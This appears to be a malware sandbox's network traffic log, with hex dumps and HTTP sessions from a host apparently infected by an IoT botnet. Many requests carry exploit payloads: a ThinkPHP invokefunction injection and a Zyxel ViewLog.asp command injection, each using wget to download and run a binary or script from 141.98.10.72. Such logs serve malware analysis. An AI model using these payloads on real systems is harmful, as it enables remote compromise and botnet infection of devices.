                                                      Feb 14, 2024 09:29:01.969432116 CET872INData Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d
                                                      Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 404 Not FoundServer: xhmmhttpsv130-202003


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      57192.168.2.155324031.136.98.1488080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:01.723453045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:02.330916882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:03.546895981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:06.074811935 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:10.938679934 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:20.666389942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:41.913851976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:20.824768066 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      58192.168.2.1551472112.74.103.11180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:01.726291895 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:02.084016085 CET442INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:29:01 GMT
                                                      Server: Apache
                                                      Vary: Accept-Encoding
                                                      Content-Encoding: gzip
                                                      Content-Length: 181
                                                      Keep-Alive: timeout=15, max=300
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8e 4d 0f f2 88 24 88 c4 94 83 47 4c d7 94 04 69 a5 c5 c7 bf 97 c7 c5 e3 ec cc 37 b3 6c 93 9c 63 71 ad 52 38 8a 53 01 55 7d 28 f2 18 fc 2d 62 9e 8a 0c 31 11 c9 ea ec 83 10 31 2d 7d ee 31 e5 1e 1d 67 8a 1a 39 09 d7 ba 8e 78 14 46 50 6a 07 99 1e 7b c9 70 3d 7a 0c 97 10 bb 69 f9 9d b9 1d ff cb 4c ca 63 86 0b 45 30 d0 73 24 eb 48 42 7d 29 00 db 5e d2 27 30 ca c0 bb b1 d0 4f c8 7d 46 40 f7 e0 54 6b c1 d2 f0 a2 21 60 68 e6 89 a5 7c aa 9b 9f f2 7e 74 46 9f df cf 00 00 00
                                                      Data Ascii: MK0,M$GLi7lcqR8SU}(-b11-}1g9xFPj{p=ziLcE0s$HB})^'0O}F@Tk!`h|~tF


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      59192.168.2.153791894.121.222.298080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:01.797812939 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      60192.168.2.154191495.86.101.878080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:01.976912022 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      61192.168.2.1555704112.105.38.9880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:02.316241980 CET690INData Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 78 68 6d 6d 68 74 74 70 73 76 31 33 30 2d 32 30 32 30 30 33 31 30 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 31 34 20 46 65 62 20 32 30 32 34 20 31 36 3a
                                                      Data Ascii: (null) 400 Bad RequestServer: xhmmhttpsv130-20200310Date: Wed, 14 Feb 2024 16:29:01 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: close<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional/


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      62192.168.2.1545294112.166.250.580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.354973078 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:03.645256042 CET35INHTTP/1.0 301 Redirect
                                                      Feb 14, 2024 09:29:03.645272970 CET399INData Raw: 53 65 72 76 65 72 3a 20 47 6f 41 68 65 61 64 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 37 3a 32 39 3a 30 33 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74
                                                      Data Ascii: Server: GoAhead-WebsDate: Wed Feb 14 17:29:03 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: (null)Location: http://127.0.0.1:8899/login.asp<html><head></head><body>This document has moved to


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      63192.168.2.1553522112.30.175.16580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.417771101 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      64192.168.2.154275094.177.134.1658080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.439055920 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:03.634959936 CET1286INHTTP/1.0 400 Bad Request
                                                      Server: squid/3.1.9
                                                      Mime-Version: 1.0
                                                      Date: Tue, 06 Apr 2021 05:24:21 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 3161
                                                      X-Squid-Error: ERR_INVALID_URL 0
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      65192.168.2.1559552112.196.74.19380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.444659948 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      66192.168.2.1556052112.197.165.13480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.449615955 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:03.825534105 CET339INHTTP/1.0 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 15:29:03 GMT
                                                      Server: Boa/0.94.14rc21
                                                      Accept-Ranges: bytes
                                                      Connection: close
                                                      Content-Type: text/html; charset=ISO-8859-1
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      67192.168.2.156061831.136.230.2128080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:03.464579105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:04.154934883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:05.530838013 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:08.378736019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.010627985 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:25.018258095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:48.057600975 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
